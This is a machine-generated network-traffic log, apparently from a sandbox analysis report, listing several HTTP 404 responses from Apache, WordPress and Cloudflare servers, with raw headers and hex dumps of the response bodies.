Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 27 May 2024 10:22:56 GMTServer: ApacheLast-Modified: Thu, 28 Dec 2023 09:40:51 GMTETag: "500c-60d8eb618ba1d"Accept-Ranges: bytesContent-Length: 20492Connection: closeContent-Type: text/html; charset=UTF-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 20 20 20 20 3c 68 65 61 64 3e 0d 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 2d 20 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 21 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 70 6e 67 22 20 68 72 65 66 3d 22 2e 2e 2f 66 61 76 69 63 6f 6e 2e 69 63 6f 22 3e 0d 0a 0d 0a 09 3c 73 74 79 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 68 74 6d 6c 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3a 20 38 30 25 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 6c 65 66 74 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3a 31 30 30 25 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 46 33 46 33 46 33 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 36 32 2e 35 25 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 27 4c 75 63 69 64 61 20 47 72 61 6e 64 65 27 2c 20 56 65 72 64 61 6e 61 2c 20 41 72 69 61 6c 2c 20 53 61 6e 73 2d 53 65 72 69 66 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 74 6f 70 3a 31 30 70 78 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 31 30 70 78 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 31 30 70 78 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 31 30 70 78 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 30 70 78 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 64 79 2c 74 64 2c 74 68 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 56 65 72 64 61 6e 61 2c 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 27 May 2024 10:22:56 GMTServer: ApacheLast-Modified: Thu, 28 Dec 2023 09:40:51 GMTETag: "500c-60d8eb618ba1d"Accept-Ranges: bytesContent-Length: 20492Connection: closeContent-Type: text/html; charset=UTF-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 20 20 20 20 3c 68 65 61 64 3e 0d 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 2d 20 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 21 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 70 6e 67 22 20 68 72 65 66 3d 22 2e 2e 2f 66 61 76 69 63 6f 6e 2e 69 63 6f 22 3e 0d 0a 0d 0a 09 3c 73 74 79 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 68 74 6d 6c 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3a 20 38 30 25 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 6c 65 66 74 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3a 31 30 30 25 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 46 33 46 33 46 33 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 36 32 2e 35 25 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 27 4c 75 63 69 64 61 20 47 72 61 6e 64 65 27 2c 20 56 65 72 64 61 6e 61 2c 20 41 72 69 61 6c 2c 20 53 61 6e 73 2d 53 65 72 69 66 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 74 6f 70 3a 31 30 70 78 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 31 30 70 78 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 31 30 70 78 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 31 30 70 78 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 30 70 78 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 64 79 2c 74 64 2c 74 68 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 56 65 72 64 61 6e 61 2c 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 27 May 2024 10:22:59 GMTServer: ApacheLast-Modified: Thu, 28 Dec 2023 09:40:51 GMTETag: "500c-60d8eb618ba1d"Accept-Ranges: bytesContent-Length: 20492Connection: closeContent-Type: text/html; charset=UTF-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 20 20 20 20 3c 68 65 61 64 3e 0d 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 2d 20 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 21 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 70 6e 67 22 20 68 72 65 66 3d 22 2e 2e 2f 66 61 76 69 63 6f 6e 2e 69 63 6f 22 3e 0d 0a 0d 0a 09 3c 73 74 79 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 68 74 6d 6c 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3a 20 38 30 25 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 6c 65 66 74 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3a 31 30 30 25 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 46 33 46 33 46 33 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 36 32 2e 35 25 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 27 4c 75 63 69 64 61 20 47 72 61 6e 64 65 27 2c 20 56 65 72 64 61 6e 61 2c 20 41 72 69 61 6c 2c 20 53 61 6e 73 2d 53 65 72 69 66 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 74 6f 70 3a 31 30 70 78 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 31 30 70 78 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 31 30 70 78 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 31 30 70 78 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 30 70 78 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 64 79 2c 74 64 2c 74 68 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 56 65 72 64 61 6e 61 2c 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 27 May 2024 10:23:20 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Vary: User-AgentLink: <https://embrace-counselor.com/wp-json/>; rel="https://api.w.org/"Content-Encoding: brData Raw: 34 63 31 31 0d 0a a5 ff 9f 00 00 fe fc ca b4 be dd 3f 5f 70 31 38 cd ec 4e 80 c8 ab 58 cc 12 6b cc 6e f5 41 b9 2f b9 bb dd a2 24 46 06 12 f9 32 0b 4d 24 00 01 c8 aa 2c d6 54 84 8a ad 0d df 6b 8d 65 8f 47 b6 37 64 af 67 25 1f 23 8f 63 b4 b3 3b 13 d6 ee 7e fd 6f 8e ae 2f 5f ef ff ab da cb 91 53 a4 4d 53 b9 ce 4c 5a 02 0f a4 9c 71 ca a4 f1 58 4d 8a 94 29 9a fd 9c e2 be f7 ee 4c f0 61 81 0f 0b 00 64 41 4a 2a 00 92 05 28 6a 3f e7 3e de 7b ee 7d 10 f0 f0 a8 21 3e ca 10 24 a8 11 41 3a 26 40 da 23 51 b6 8a 50 94 0a c9 93 42 96 53 d8 5d 1c a7 72 95 a2 21 e9 cf 48 1e 8f 27 e3 49 e1 4c 66 52 a4 4e 9b 5e fe 34 45 9a d2 4d 9f 3a cb e8 9b ff 7f 6d dd da e3 d6 fa 5e 1d 20 84 10 42 08 df f1 07 f0 d2 d7 5f 7e 78 f3 c9 e9 a3 5b 68 ee 5b 39 bb f2 d2 dc b7 12 49 a6 9a a3 d1 73 36 42 15 f3 0c 4b cd 2a a8 8e 46 35 93 0e ae 1f da 71 ab a5 7c fb be 9a 16 54 77 34 e2 52 3b a8 46 b3 2b 2f cd 81 55 b3 2b 2f b5 e0 19 e2 73 66 1d f8 a3 51 e7 6b 3c 19 3d fe 79 15 6b e1 68 54 6b db 32 8f 2b f0 c0 bd d0 6a 84 b8 56 1e 94 3f 1a 79 90 60 e6 5a c1 91 d2 21 7f 99 73 ef 0d 86 b7 3a b1 38 1a bd 86 9f 1e e3 9b ba 35 cc 8b 52 42 f0 c3 9d dc 3a 82 aa 81 f8 de 70 21 60 69 b4 f5 9e 1f bc 14 95 9f 1f 55 b0 10 1c f0 85 a9 10 fd 79 02 b8 16 fe 88 eb 05 58 58 2f b9 6a 75 a9 bd bb 1a e5 ff c0 5d 55 5a a8 0a fa 10 29 5d 6b 29 f5 f2 2a da 9f 5d 79 49 0a 75 8e 2c c8 a3 ab 95 72 d8 58 a8 c1 f3 f9 55 34 b7 50 1f 5d dd df 87 b6 b4 8c 03 e6 ba 53 0e a4 b6 84 eb f6 2a da 9f 5d 09 fe 36 72 9e 79 47 96 26 d4 2b c7 e9 ef 9f 5f cf c1 1b c6 cf c9 52 db ca 58 70 0e bf 1e c6 f6 13 dc 74 a5 14 1c 33 23 fe 7b 7b 51 d2 58 b6 60 9e 11 70 b5 a3 70 63 8e bf d7 23 26 3d 58 c5 3c 8c 90 5f 19 38 1a 31 63 a4 e0 cc 0b ad f6 ad 73 d7 fb 56 8e 90 17 5e c2 d1 e8 56 d6 7f 8b e8 6f 2c 7b ab d3 53 34 bc f8 d9 70 f9 db e1 c5 a7 c3 8b ef 8d 10 bd 37 a3 b9 f7 c6 e5 6c f2 bb 67 bf 06 a8 f6 47 78 fc 24 be fc 64 78 f1 9b e1 c5 27 c3 8b ef e2 f4 86 5c b7 2d 28 ef 90 fb ce af bc f4 75 8c d1 e3 5b 0f d1 e3 93 fb 8f ee dd 42 8f 8e 6f 7e 13 25 24 26 11 c2 78 76 e5 25 82 fc 20 66 29 4d 73 34 bc f8 c5 f0 e2 d3 e1 f2 df 87 ed 0f bf fc f0 07 c3 f6 9f 86 ed 0f 86 cb ef 0f db ff 3b 6c 7f 39 5c be 37 6c 3f 1a b6 3f 1f b6 1f 20 8c b0 9f 78 69 1f 88 2e e4 58 38 a5 2c a0 17 eb e5 70 15 38 6e 85 11 39 ef f7 e5 77 fe f0 d5 3f 7c 6f b8 fc 8f e1 c5 2f 86 cb 7f 21 c6 ff 95 7e 3f bc f8 f5 57 bf f8 d5 67 7f fa 64 78 7b 7b f7 f1 a3 bd 2f fe e3 fb 5f fc cf 3f 0f db 9f 0d 97 ef fd f5 d3 ef 0d 6f 6f 8f c9 cb e4 ee cb 7f fd f4 bb 9f 7f f2 bb cf df f9 f1 e7 ff fc eb cf df fd d1 5f 3f fd de Data Ascii: 4c11?_p18NXknA/$F2M$,T
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 27 May 2024 10:23:22 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Vary: User-AgentLink: <https://embrace-counselor.com/wp-json/>; rel="https://api.w.org/"Content-Encoding: brData Raw: 34 63 31 31 0d 0a a5 ff 9f 00 00 fe fc ca b4 be dd 3f 5f 70 31 38 cd ec 4e 80 c8 ab 58 cc 12 6b cc 6e f5 41 b9 2f b9 bb dd a2 24 46 06 12 f9 32 0b 4d 24 00 01 c8 aa 2c d6 54 84 8a ad 0d df 6b 8d 65 8f 47 b6 37 64 af 67 25 1f 23 8f 63 b4 b3 3b 13 d6 ee 7e fd 6f 8e ae 2f 5f ef ff ab da cb 91 53 a4 4d 53 b9 ce 4c 5a 02 0f a4 9c 71 ca a4 f1 58 4d 8a 94 29 9a fd 9c e2 be f7 ee 4c f0 61 81 0f 0b 00 64 41 4a 2a 00 92 05 28 6a 3f e7 3e de 7b ee 7d 10 f0 f0 a8 21 3e ca 10 24 a8 11 41 3a 26 40 da 23 51 b6 8a 50 94 0a c9 93 42 96 53 d8 5d 1c a7 72 95 a2 21 e9 cf 48 1e 8f 27 e3 49 e1 4c 66 52 a4 4e 9b 5e fe 34 45 9a d2 4d 9f 3a cb e8 9b ff 7f 6d dd da e3 d6 fa 5e 1d 20 84 10 42 08 df f1 07 f0 d2 d7 5f 7e 78 f3 c9 e9 a3 5b 68 ee 5b 39 bb f2 d2 dc b7 12 49 a6 9a a3 d1 73 36 42 15 f3 0c 4b cd 2a a8 8e 46 35 93 0e ae 1f da 71 ab a5 7c fb be 9a 16 54 77 34 e2 52 3b a8 46 b3 2b 2f cd 81 55 b3 2b 2f b5 e0 19 e2 73 66 1d f8 a3 51 e7 6b 3c 19 3d fe 79 15 6b e1 68 54 6b db 32 8f 2b f0 c0 bd d0 6a 84 b8 56 1e 94 3f 1a 79 90 60 e6 5a c1 91 d2 21 7f 99 73 ef 0d 86 b7 3a b1 38 1a bd 86 9f 1e e3 9b ba 35 cc 8b 52 42 f0 c3 9d dc 3a 82 aa 81 f8 de 70 21 60 69 b4 f5 9e 1f bc 14 95 9f 1f 55 b0 10 1c f0 85 a9 10 fd 79 02 b8 16 fe 88 eb 05 58 58 2f b9 6a 75 a9 bd bb 1a e5 ff c0 5d 55 5a a8 0a fa 10 29 5d 6b 29 f5 f2 2a da 9f 5d 79 49 0a 75 8e 2c c8 a3 ab 95 72 d8 58 a8 c1 f3 f9 55 34 b7 50 1f 5d dd df 87 b6 b4 8c 03 e6 ba 53 0e a4 b6 84 eb f6 2a da 9f 5d 09 fe 36 72 9e 79 47 96 26 d4 2b c7 e9 ef 9f 5f cf c1 1b c6 cf c9 52 db ca 58 70 0e bf 1e c6 f6 13 dc 74 a5 14 1c 33 23 fe 7b 7b 51 d2 58 b6 60 9e 11 70 b5 a3 70 63 8e bf d7 23 26 3d 58 c5 3c 8c 90 5f 19 38 1a 31 63 a4 e0 cc 0b ad f6 ad 73 d7 fb 56 8e 90 17 5e c2 d1 e8 56 d6 7f 8b e8 6f 2c 7b ab d3 53 34 bc f8 d9 70 f9 db e1 c5 a7 c3 8b ef 8d 10 bd 37 a3 b9 f7 c6 e5 6c f2 bb 67 bf 06 a8 f6 47 78 fc 24 be fc 64 78 f1 9b e1 c5 27 c3 8b ef e2 f4 86 5c b7 2d 28 ef 90 fb ce af bc f4 75 8c d1 e3 5b 0f d1 e3 93 fb 8f ee dd 42 8f 8e 6f 7e 13 25 24 26 11 c2 78 76 e5 25 82 fc 20 66 29 4d 73 34 bc f8 c5 f0 e2 d3 e1 f2 df 87 ed 0f bf fc f0 07 c3 f6 9f 86 ed 0f 86 cb ef 0f db ff 3b 6c 7f 39 5c be 37 6c 3f 1a b6 3f 1f b6 1f 20 8c b0 9f 78 69 1f 88 2e e4 58 38 a5 2c a0 17 eb e5 70 15 38 6e 85 11 39 ef f7 e5 77 fe f0 d5 3f 7c 6f b8 fc 8f e1 c5 2f 86 cb 7f 21 c6 ff 95 7e 3f bc f8 f5 57 bf f8 d5 67 7f fa 64 78 7b 7b f7 f1 a3 bd 2f fe e3 fb 5f fc cf 3f 0f db 9f 0d 97 ef fd f5 d3 ef 0d 6f 6f 8f c9 cb e4 ee cb 7f fd f4 bb 9f 7f f2 bb cf df f9 f1 e7 ff fc eb cf df fd d1 5f 3f fd de Data Ascii: 4c11?_p18NXknA/$F2M$,T
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 27 May 2024 10:23:25 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Vary: User-AgentLink: <https://embrace-counselor.com/wp-json/>; rel="https://api.w.org/"Content-Encoding: brData Raw: 34 63 31 31 0d 0a a5 ff 9f 00 00 fe fc ca b4 be dd 3f 5f 70 31 38 cd ec 4e 80 c8 ab 58 cc 12 6b cc 6e f5 41 b9 2f b9 bb dd a2 24 46 06 12 f9 32 0b 4d 24 00 01 c8 aa 2c d6 54 84 8a ad 0d df 6b 8d 65 8f 47 b6 37 64 af 67 25 1f 23 8f 63 b4 b3 3b 13 d6 ee 7e fd 6f 8e ae 2f 5f ef ff ab da cb 91 53 a4 4d 53 b9 ce 4c 5a 02 0f a4 9c 71 ca a4 f1 58 4d 8a 94 29 9a fd 9c e2 be f7 ee 4c f0 61 81 0f 0b 00 64 41 4a 2a 00 92 05 28 6a 3f e7 3e de 7b ee 7d 10 f0 f0 a8 21 3e ca 10 24 a8 11 41 3a 26 40 da 23 51 b6 8a 50 94 0a c9 93 42 96 53 d8 5d 1c a7 72 95 a2 21 e9 cf 48 1e 8f 27 e3 49 e1 4c 66 52 a4 4e 9b 5e fe 34 45 9a d2 4d 9f 3a cb e8 9b ff 7f 6d dd da e3 d6 fa 5e 1d 20 84 10 42 08 df f1 07 f0 d2 d7 5f 7e 78 f3 c9 e9 a3 5b 68 ee 5b 39 bb f2 d2 dc b7 12 49 a6 9a a3 d1 73 36 42 15 f3 0c 4b cd 2a a8 8e 46 35 93 0e ae 1f da 71 ab a5 7c fb be 9a 16 54 77 34 e2 52 3b a8 46 b3 2b 2f cd 81 55 b3 2b 2f b5 e0 19 e2 73 66 1d f8 a3 51 e7 6b 3c 19 3d fe 79 15 6b e1 68 54 6b db 32 8f 2b f0 c0 bd d0 6a 84 b8 56 1e 94 3f 1a 79 90 60 e6 5a c1 91 d2 21 7f 99 73 ef 0d 86 b7 3a b1 38 1a bd 86 9f 1e e3 9b ba 35 cc 8b 52 42 f0 c3 9d dc 3a 82 aa 81 f8 de 70 21 60 69 b4 f5 9e 1f bc 14 95 9f 1f 55 b0 10 1c f0 85 a9 10 fd 79 02 b8 16 fe 88 eb 05 58 58 2f b9 6a 75 a9 bd bb 1a e5 ff c0 5d 55 5a a8 0a fa 10 29 5d 6b 29 f5 f2 2a da 9f 5d 79 49 0a 75 8e 2c c8 a3 ab 95 72 d8 58 a8 c1 f3 f9 55 34 b7 50 1f 5d dd df 87 b6 b4 8c 03 e6 ba 53 0e a4 b6 84 eb f6 2a da 9f 5d 09 fe 36 72 9e 79 47 96 26 d4 2b c7 e9 ef 9f 5f cf c1 1b c6 cf c9 52 db ca 58 70 0e bf 1e c6 f6 13 dc 74 a5 14 1c 33 23 fe 7b 7b 51 d2 58 b6 60 9e 11 70 b5 a3 70 63 8e bf d7 23 26 3d 58 c5 3c 8c 90 5f 19 38 1a 31 63 a4 e0 cc 0b ad f6 ad 73 d7 fb 56 8e 90 17 5e c2 d1 e8 56 d6 7f 8b e8 6f 2c 7b ab d3 53 34 bc f8 d9 70 f9 db e1 c5 a7 c3 8b ef 8d 10 bd 37 a3 b9 f7 c6 e5 6c f2 bb 67 bf 06 a8 f6 47 78 fc 24 be fc 64 78 f1 9b e1 c5 27 c3 8b ef e2 f4 86 5c b7 2d 28 ef 90 fb ce af bc f4 75 8c d1 e3 5b 0f d1 e3 93 fb 8f ee dd 42 8f 8e 6f 7e 13 25 24 26 11 c2 78 76 e5 25 82 fc 20 66 29 4d 73 34 bc f8 c5 f0 e2 d3 e1 f2 df 87 ed 0f bf fc f0 07 c3 f6 9f 86 ed 0f 86 cb ef 0f db ff 3b 6c 7f 39 5c be 37 6c 3f 1a b6 3f 1f b6 1f 20 8c b0 9f 78 69 1f 88 2e e4 58 38 a5 2c a0 17 eb e5 70 15 38 6e 85 11 39 ef f7 e5 77 fe f0 d5 3f 7c 6f b8 fc 8f e1 c5 2f 86 cb 7f 21 c6 ff 95 7e 3f bc f8 f5 57 bf f8 d5 67 7f fa 64 78 7b 7b f7 f1 a3 bd 2f fe e3 fb 5f fc cf 3f 0f db 9f 0d 97 ef fd f5 d3 ef 0d 6f 6f 8f c9 cb e4 ee cb 7f fd f4 bb 9f 7f f2 bb cf df f9 f1 e7 ff fc eb cf df fd d1 5f 3f fd de Data Ascii: 4c11?_p18NXknA/$F2M$,T
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 27 May 2024 10:23:33 GMTContent-Type: text/plain; charset=utf-8Content-Length: 9Connection: closeAccess-Control-Allow-Origin: http://www.drednents.esVary: Origin, Accept-EncodingAccess-Control-Allow-Credentials: trueX-XSS-Protection: 1; mode=blockX-Frame-Options: DENYX-Download-Options: noopenX-Content-Type-Options: nosniffETag: W/"9-0gXL1ngzMqISxa6S1zx3F4wtLyg"CF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=JHelHxjpgicv8xl%2B2Fi2igkr0QVWW1nsKk6VfGvWF%2FToU74I%2B9q%2Bzv8Z42oW5ocga0kscFqb1VzFjSI%2FNofb3Q9BzUALQbuDIgPOngGraGGAgL8dXg8RmBndBWe2dfO5pvW0"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 88a54a498d8d41db-EWRalt-svc: h3=":443"; ma=86400Data Raw: 4e 6f 74 20 46 6f 75 6e 64 Data Ascii: Not Found
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 27 May 2024 10:23:36 GMTContent-Type: text/plain; charset=utf-8Content-Length: 9Connection: closeAccess-Control-Allow-Origin: http://www.drednents.esVary: Origin, Accept-EncodingAccess-Control-Allow-Credentials: trueX-XSS-Protection: 1; mode=blockX-Frame-Options: DENYX-Download-Options: noopenX-Content-Type-Options: nosniffETag: W/"9-0gXL1ngzMqISxa6S1zx3F4wtLyg"CF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Fg0G%2BUY373NymVd4bYGVGpwz5W85m9ShPWNXM8YHchBcnG5v1JwGvOko6hVnq6Fft3Pt2x11adbKZoIiyEh%2Fq2kMZU4wEv0Xy7D7jCHba9IWJNDTl%2FDYfT1521AtyC6OS7h2"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 88a54a59fcf7181d-EWRalt-svc: h3=":443"; ma=86400Data Raw: 4e 6f 74 20 46 6f 75 6e 64 Data Ascii: Not Found
